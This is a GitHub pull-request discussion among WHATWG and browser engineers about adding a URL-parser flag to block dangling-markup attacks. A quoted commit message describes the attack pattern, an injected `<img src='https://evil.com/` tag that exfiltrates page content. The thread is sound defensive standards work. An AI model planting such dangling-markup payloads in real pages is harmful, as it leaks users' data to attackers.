
Record whether the URL parser removed newlines. #284

Closed
wants to merge 4 commits into from

Conversation

mikewest
Member

@mikewest mikewest commented Mar 28, 2017

In order to support checks like those sketched out in 1, it would
be helpful to record at parse-time whether or not tabs and newline
characters were stripped from a given URL. This patch does so by
adding a cleverly-named flag that could be referenced from other
specifications. Fetch, for instance.


Preview | Diff

@annevk
Member

annevk commented Mar 28, 2017

Apart from nits this looks reasonable. I'm guessing it's fine to leave this as a PR until there's also Fetch integration, tests, and hopefully interest from more implementers?

@annevk annevk added the "needs implementer interest", "needs tests", and "topic: parser" labels Mar 28, 2017
mikewest added a commit to whatwg/fetch that referenced this pull request Mar 28, 2017
As a mitigation against dangling markup attacks (which inject open tags like
`<img src='https://evil.com/` that eat up subsequent markup, and exfiltrate
content to an attacker), this patch tightens request processing to reject
those that contain a `<` character (consistent with an HTML element), _and_
had newline characters stripped during URL parsing (see whatwg/url#284).

It might be possible to block URLs whose newline characters were stripped entirely,
based on initial metrics. If those pan out the way I hope, we can tighten
this up in the future.
@mikewest
Member Author

Updated with a less-than flag, as discussed in whatwg/fetch#519.

@achristensen07
Collaborator

I'm ok with having a conceptual reference to something like this, but I don't think this necessarily belongs in the URL spec and I would be quite opposed to exposing this to JavaScript or something like that. WebKit's implementation doesn't actually spend the extra time to look through the URL twice to check for tabs or newlines, and we should make it as straightforward as possible to implement efficient URL parsers.

@annevk
Member

annevk commented May 23, 2017

@achristensen07 where would it belong? You can't do it after the fact, since by then the newlines are gone and `<` is percent-encoded (and I don't think you want to fail fetching on the percent-encoded variant; that'd just be wrong).

It would be observable to JavaScript due to the Fetch integration. Implementing this in a single-pass implementation seems relatively straightforward, though, if you already do whitespace removal that way.

@annevk
Member

annevk commented May 23, 2017

Do we want these flags to remain independent? If they're only ever used together...

@achristensen07
Collaborator

I guess it might not be completely catastrophic to add some code in the unlikely branches taken when a tab or newline is hit. I'm also concerned about adding another bool to a URL object which ought to remain simple and small, but maybe the slippery slope argument won't be enough to stop this.
I also think it's a bad idea to put something that blocks content that looks like an attack into the fetch spec, but that's an argument to be had there.

@mikewest
Member Author

WebKit's implementation doesn't actually spend the extra time to look through the URL twice to check for tabs or newlines, and we should make it as straightforward as possible to implement efficient URL parsers.

I believe putting this into URL makes it possible for us to avoid walking through the URL twice. As @annevk notes, after parsing the URL, the data we're looking for is actually unavailable. We'd have to have a pre-processing step in various callsites in HTML (basically wrapping the URL parsing call with something that holds a variable), which is certainly doable, but strange.

We're already walking through the URL once to remove newlines; recording that state then seems reasonable.

Do we want these flags to remain independent? If they're only ever used together...

Yeah. I realized this while playing with an implementation in Chrome; I'll update this patch accordingly.

@mikewest
Member Author

I guess it might not be completely catastrophic to add some code in the unlikely branches taken when a tab or newline is hit.

What does WebKit's implementation of newline removal look like now? Do y'all just farm out to NSURL?

I'm also concerned about adding another bool to a URL object which ought to remain simple and small, but maybe the slippery slope argument won't be enough to stop this.

As written here, the flag isn't exposed to the web (except implicitly via the Fetch behavior, as @annevk notes). I agree that it doesn't seem necessary to add a bool to the URL interface.

I also think it's a bad idea to put something that blocks content that looks like an attack into the fetch spec, but that's an argument to be had there.

Happy to have that discussion on the other patch: whatwg/fetch#519. Given that we're already doing things like https://fetch.spec.whatwg.org/#should-response-to-request-be-blocked-due-to-mime-type? there, this doesn't seem like much of a stretch, but I'm interested in hearing about possible alternatives.

@mikewest
Member Author

1ab78b5 changes the algorithm to bring it in line with what I expect implementations are doing today: copying non-tab/newline characters to a new string. Setting this flag turns into one extra if in that loop; we don't actually have to walk the whole string a second time.

WDYT?
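To make the single-pass idea concrete, here is a hypothetical sketch (not the spec text or any browser's actual code; `stripAndRecord` and the flag names are invented for illustration): non-tab/newline characters are copied to a new string, and the flags are recorded as a side effect of that same loop, so no second walk over the string is needed.

```javascript
// Hypothetical sketch: strip tabs and newlines from a URL string in a
// single pass, recording whether anything was stripped and whether a
// "<" was seen. One extra comparison per character, no second scan.
function stripAndRecord(input) {
  let out = "";
  let whitespaceEncountered = false;
  let lessThanEncountered = false;
  for (const ch of input) {
    if (ch === "\t" || ch === "\n" || ch === "\r") {
      whitespaceEncountered = true; // drop the character, remember we saw it
      continue;
    }
    if (ch === "<") lessThanEncountered = true;
    out += ch;
  }
  return { out, whitespaceEncountered, lessThanEncountered };
}
```

A Fetch-side check could then consult both flags later without re-scanning the (already stripped) serialization.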

@achristensen07
Collaborator

A more efficient implementation can be (and has been) done in https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/platform/URLParser.cpp
In the common case it will look at each code point in the input string once (except for a bit of extra processing in the host), increment the refcount of the unmodified string, and store some offsets in an efficient data structure. Newline and tab checking is not done in a separate, simple loop, but rather every time the iterator over the input is incremented. All this is just an implementation detail and people can implement the spec however they see fit, but I am opposed to making additional data fields and operations necessary everywhere in efficient implementations of an algorithm, especially if the benefit is just to guess whether fetched data is malicious.

@mikewest
Member Author

Newline and tab checking is not done in a separate and simple loop, but rather every time the iterator on the input is incremented.

That's a clever implementation, thanks for sharing the link!

I agree that it would be a little more work for y'all to get the behavior specced here, but I think you can still do it in a single pass. For example, I could imagine that the two-flag proposal from earlier in the thread might be reasonable:

++iterator;
while (UNLIKELY(!iterator.atEnd() && isTabOrNewline(*iterator))) {
    // Record that whitespace was stripped as a side effect of skipping it.
    m_whitespaceEncountered = true;
    if (reportSyntaxViolation == ReportSyntaxViolation::Yes)
        syntaxViolation(iteratorForSyntaxViolationPosition);
    ++iterator;
}
// Guard against dereferencing a finished iterator before the "<" check.
if (UNLIKELY(!iterator.atEnd() && *iterator == '<'))
    m_lessThanEncountered = true;

with a corresponding value on URL that you'd set in either URL's or URLParser's constructor after parsing. That comes at a cost of an extra if for every call to advance(), and three bools (two on URLParser and one on URL).

All this is just an implementation detail and people can implement the spec however they see fit, but I oppose to adding necessary data fields and additional operations everywhere in efficient implementations of an algorithm, especially if the benefit is just to guess whether fetched data is malicious.

I agree that the benefit is something we'd need to weigh against the performance costs, and that's a judgement call that I can't make for the WebKit project. From my perspective, dangling markup is a well-known and fairly soft target for attackers. As we continue to close off other avenues for code injection (via CSP, etc.), it's only going to increase in impact. Killing off a substantial portion of this class of attack seems like it's worth some cost to URL processing speed.

@domenic
Member

domenic commented May 23, 2017

We'd have to have a pre-processing step in various callsites in HTML (basically wrapping the URL parsing call with something that holds a variable), which is certainly doable, but strange.

As written here, the flag isn't exposed to the web

I think it might be good to point this out in the spec, and further elaborate on the nature of this flag as not relevant for the general URL parsing behavior that the URL Standard mostly covers. I would phrase it as something like this:

NOTE: the potentially-dangling-markup flag is stored for later use by the HTML Standard to mitigate certain attack scenarios. Conceptually, it is not really a part of the URL record type, but is kept here for convenience. An alternate specification or implementation strategy would be that all invocations of the URL parser in HTML first scan the input string for the appropriate patterns, before performing the normal URL parsing algorithm. Implementations that do not plan to implement the relevant parts of the HTML Standard can ignore this flag and parts of the parsing algorithm that set it.

However in writing the above I realize I am confused. Is this a mitigation applied to Fetch, or to HTML? I think the PRs apply it to Fetch, right? (Unlike my above paragraph states.) Which means that attempting to do

new WebSocket(new URL(`wss://example.com/foo\nbar>baz`).href);

will fail, right? Are there tests for this (and for other non-HTML-markup-related URL parsing behaviors)? Is this even desirable? Maybe the specification layering where HTML wraps specific invocations of the URL parser would be better after all...

@mikewest
Member Author

However in writing the above I realize I am confused. Is this a mitigation applied to Fetch, or to HTML? I think the PRs apply it to Fetch, right?

That's correct. It seems simplest to make the behavior consistent at the Fetch layer.

new WebSocket(new URL(`wss://example.com/foo\nbar>baz`).href);

This wouldn't fail, actually, because you're stringifying a parsed URL. That is, the result of new URL(...) would have set this flag, but the flag isn't represented in the stringification. So, the string passed into new WebSocket() contains neither < nor \n. new WebSocket(`wss://example.com/foo\nbar>baz`), on the other hand, would be blocked.
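This round-trip behavior can be checked against any WHATWG-conformant URL implementation (Node's `URL`, for instance); the expected serialization below assumes spec-conformant newline stripping and path percent-encoding:

```javascript
// The URL parser strips the raw "\n" and percent-encodes ">" in the
// path, so the serialized href contains neither character. Re-parsing
// the href would therefore never set the proposed flag.
const url = new URL("wss://example.com/foo\nbar>baz");
console.log(url.href); // "wss://example.com/foobar%3Ebaz"
```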

Maybe the specification layering where HTML wraps specific invocations of the URL parser would be better after all...

Writing it that way is fine, if cumbersome because of all the call sites. I don't intend to implement it that way in Blink, however. As noted above, URL parsing is expensive, and I don't think there's much appetite for doing more loops through the string.

I understand that it's confusing to put a flag like this into URL if it's not used in URL, but if we put it somewhere else, I think we'd probably end up adding a note about how implementers should probably implement it as part of their URL parser. If you're happier with that as an outcome, I can type it up.

@domenic
Member

domenic commented May 23, 2017

This wouldn't fail, actually, because you're stringifying a parsed URL.

Right, thanks. I guess I meant

new WebSocket(`wss://example.com/foo\nbar>baz`);

will fail. Again, is this desired behavior? Are there tests for it, and other cases like it?

@annevk
Member

annevk commented May 23, 2017

If you're happier with that as an outcome, I can type it up.

I don't think I would be. Those kinds of mismatches with implementations have a tendency to completely break down over time. We could still restrict which call sites the flag has an effect on, though it's unclear whether that's worth it.

@mikewest
Member Author

Right, thanks. I guess I meant

new WebSocket(`wss://example.com/foo\nbar>baz`);

will fail. Again, is this desired behavior?

I think so, yes. If we're going to block raw \n and < in one context, it makes sense to block them in all contexts. Otherwise we're just introducing confusing distinctions.

Are there tests for it, and other cases like it?

I've added fetch tests to Chrome's tentative implementation of this behavior. Should be upstreamed shortly.

@mikewest
Member Author

I don't think I would be. Those kind of mismatches with implementations have the tendency to completely break down over time.

FWIW, I agree. Doing things in URL makes much more sense to me.

We could still restrict which call sites the flag has an effect on, though it's unclear whether that's worth it.

I don't think that would be worthwhile, but if others do, I wouldn't strenuously object. :)

chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
whatwg/url#284 and
whatwg/fetch#519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <[email protected]>
Cr-Commit-Position: refs/heads/master@{#474249}
WPT-Export-Revision: 34b8d6ab689b1ecedef332baa2a155b543f50fa7
chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
@achristensen07
Collaborator

I think since this is trying to prevent an HTML parsing attack, it belongs in the HTML spec. I am opposed to putting this in the URL spec. Strings in HTML are such a small subset of the uses of URLs.

@achristensen07
Collaborator

Note: I don't oppose preventing the attack. If I were to implement the attack prevention, I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser and search for this one attack in that one place. I think the spec could be more similar to that, and if we instead want to put concepts here, then they should not change the behavior of all URL parsing or require more memory for all URLs.

chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
@mikewest
Member Author

I think since this is trying to prevent an HTML parsing attack, it belongs in the HTML spec. I am opposed to putting this in the URL spec. Strings in HTML are such a small subset of the uses of URLs.

Note: I don't oppose preventing the attack. If I were to implement the attack prevention, I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser and search for this one attack in that one place. I think the spec could be more similar to that, and if we instead want to put concepts here, then they should not change the behavior of all URL parsing or require more memory for all URLs.

I'm sympathetic to this, but if WebKit implemented something along these lines, wouldn't y'all do it in the URL parser? I don't think Blink would accept running through the string again. In fact, I know we wouldn't, because my first pass at adding metrics for this did three string scans when completing URLs, causing a ~30% drop in parsing performance on Android and triggering exciting alerts in my inbox (https://bugs.chromium.org/p/chromium/issues/detail?id=682300). :)

Given that it makes sense for the implementation to live in the URL parser, defining it there seems to also make sense.

@achristensen07
Collaborator

Our URL object is used for many things in the operating system that have nothing to do with HTML parsing. We have many public APIs for apps that create URL objects behind the scenes, for example. We also do many things with the network that have nothing to do with HTML. We would not want to slow all of those things down, even by decreasing instruction locality by adding instructions in unlikely branches, and we would not want to require more memory for all of those URL objects. If I implemented this change in WebKit, I would have to look into how performance is actually affected and consider many things, but my initial thought is that I would just pre-scan the String passed from the HTML/SVG parser to the URL parser. As one of the (probably majority of) URL users doing things with URLs unrelated to HTML, I do not think this belongs in the URL specification.

MXEBot pushed a commit to mirror/chromium that referenced this pull request May 25, 2017
@domenic
Member

domenic commented May 25, 2017

I'm very sympathetic to @achristensen07's point of view conceptually. In particular I am very happy that WebKit uses these URL objects behind the scenes for all networking; that is exactly how it should be. But I want to try to tease out the concrete objection.

My take is that it should be an editorial decision (as in, up to the editor) as to where this field is stored, as long as the observable consequences are the same. I strongly urge the editor to include a note similar to mine in #284 (comment) (modified to talk about Fetch instead of HTML) so that people implementing this spec can understand that storing the flag inside the URL is a spec convenience, and they may want to make alternate implementation decisions (e.g. if they plan on flowing the URLs into places that are never fetched).

However, what I am concerned about is whether we have cross-browser agreement on applying this mitigation, and particularly the scope of it, in terms of observable consequences. My understanding is that @achristensen07 "doesn't oppose" preventing the attack. But does that include preventing it for all other places URLs are parsed and then go through the Fetch spec, as the current set of patches do? His follow-up comment "I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser" implies he might not be on board with the full scope of the currently-proposed mitigation, which includes, as I said, everywhere a URL is parsed and then fed to Fetch. My go-to example in this thread has been new WebSocket(), but it will also include fetch(), XMLHttpRequest, payment method manifest fetching, etc. Not just fetches initiated by HTML tags.

So, @achristensen07: leaving editorial issues of how the spec is written aside (at least for now), what are your thoughts on the actual mitigation strategy proposed?

@mikewest
Member Author

my initial thought is that I would just pre-scan the String given from the HTML/SVG parser to the URL parser

Running through every URL is expensive; as I noted above, a very naive implementation caused a ~30% regression in one of Blink's parsing benchmarks. I imagine a cleverer implementation would have less impact, but it seems non-negligible.

I could also imagine tagging the attribute as containing newlines and less-than characters during HTML tokenization/parsing, but that a) also seems expensive, and b) would require holding a boolean on each attribute, which seems more expensive than holding a boolean on a URL.

Do you have a different approach in mind, @achristensen07? I'm not at all philosophically tied to putting this into the URL parser, but it seems like the most efficient place to do the work, especially since we're already required to remove newline characters from URLs. Why not recognize other properties at the same time?

@achristensen07
Collaborator

I think that mitigation of an HTML injection attack should go in the HTML spec. It is bad design to instead try to catch it at all the points of data entry into the HTML parser. What if someone dynamically generates a malicious HTML string with JavaScript, for example? I think it's also bad design to put more HTML concepts into the URL spec, which is used for non-HTML applications. If an implementer feels that they want to slow down their URL parser to implement it, then they can do that. I probably wouldn't.

@mikewest
Member Author

I think that mitigation of an HTML injection attack should go in the HTML spec.

Let's say that we go this route, and alter https://html.spec.whatwg.org/#resolving-urls to scan the input string for characters we don't like. That seems fine in itself, and we could add a note to implementers about doing this work in parallel with whitespace removal if they feel like it (because, as we've both noted, scanning through every URL string is expensive). We could then look at the scheme of the resulting URL record and abort with a parse error for those URLs containing both character types and HTTP(S) schemes.
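That alternative can be sketched as follows (purely illustrative; `parseAURLWithMitigation` is an invented name, and real spec text would live in HTML's "parse a URL" wrapper rather than in script): pre-scan the input, parse as usual, then reject HTTP(S) results whose input contained both character types.

```javascript
// Hypothetical HTML-layer wrapper: pre-scan the input string, parse as
// usual, then treat the result as a parse error when the input contained
// both a tab/newline and a "<" and the resulting scheme is HTTP(S).
function parseAURLWithMitigation(input, base) {
  const hadTabOrNewline = /[\t\n\r]/.test(input);
  const hadLessThan = input.includes("<");
  let url;
  try {
    url = new URL(input, base);
  } catch {
    return null; // ordinary parse error
  }
  if (hadTabOrNewline && hadLessThan &&
      (url.protocol === "http:" || url.protocol === "https:")) {
    return null; // reject per the proposed mitigation
  }
  return url;
}
```

Note the extra scans over the input that this wrapper implies, which is exactly the performance concern discussed in this thread.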

I think that would be somewhat equivalent to the current set of patches in the main set of cases that I care about (with the caveats that the errors would look different: TypeError in a few places as opposed to network errors), but has the strange side effect that APIs begin to behave differently depending on where they're defined. APIs like Worker are in HTML, and use HTML's "parse a URL" wrapper, so they'd exhibit the new behavior. APIs like fetch() and XHR do not use HTML's wrapper, so they wouldn't.

And actually, looking at HTML again, not everything there uses the wrapper: WebSocket uses the URL parser directly, for example. So I suppose we'd need to audit all the parsing usage to see what we think the behavior ought to be (and ensure that we do the same as new parsing usage is added). I think that would leave us with a fairly confusing story for developers.

@mikewest
Member Author

@annevk: What would you like me to do here?

@annevk
Member

annevk commented Jun 29, 2017

If we don't want to overload the generic URL parser we should figure out in which places this attack can take place (only HTML/SVG element attributes I assume?) and only apply the mitigation there. That might involve creating a new abstraction to invoke from these places.

malloxpb pushed a commit to scrapy/url-chromium that referenced this pull request Jul 12, 2018
@annevk annevk closed this Jan 15, 2021
@annevk annevk deleted the branch whatwg:master January 15, 2021 07:41
@annevk
Member

annevk commented Feb 15, 2021

Note that I think this got closed because @mikewest removed his fork and the default branch was renamed to main. This issue will continue to be tracked in whatwg/fetch#546.
